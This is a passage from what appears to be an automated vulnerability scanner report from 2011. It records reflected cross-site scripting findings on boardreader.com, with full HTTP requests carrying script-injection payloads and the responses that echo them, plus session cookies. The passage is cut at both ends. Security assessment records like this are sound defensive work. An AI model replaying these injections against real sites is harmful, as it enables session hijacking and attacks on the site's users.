User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:53:22 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:24 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<script>
       
            var ACTIVE_GRAPH_GROUP = 'day';
            var ACTIVE_GRAPH_URL = '/linksGraphXML.php?a=domain&q=nolanfans.com&9419e'-alert(1)-'6dbeba69c1=1&p=30&d=1288940004&b=0&g=&x=1';
                        var selectedLinkGraph = 'graph3Months';
       
if (selectedLinkGraph == 'graphDay' )
selectedLinkGraph = 'g
...[SNIP]...

4.92. http://boardreader.com/domain/ratedesi.com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path:   /domain/ratedesi.com

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffe4a"><script>alert(1)</script>5a4d6909fb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /domain/ratedesi.com?ffe4a"><script>alert(1)</script>5a4d6909fb2=1 HTTP/1.1
Host: boardreader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=69622787.1296677346.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/43|utmcmd=referral; PHPSESSID=uuhtplkaiu2jk4296c5eo0e3e1; __utma=69622787.1197951510.1296677341.1296677341.1296677341.1; __utmc=69622787; human_user=true; __utmb=69622787;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 06:53:30 GMT
Server: Apache
Expires: Thu, 03 Feb 2011 12:53:31 +0000
Cache-Control: no-store, max-age=21600
Pragma:
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
       <meta name="verif
...[SNIP]...
<a class="fp_adv" href="/a/ratedesi.com?ffe4a"><script>alert(1)</script>5a4d6909fb2=1">
...[SNIP]...

4.93. http://boardreader.com/domain/ratedesi.com [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://boardreader.com
Path: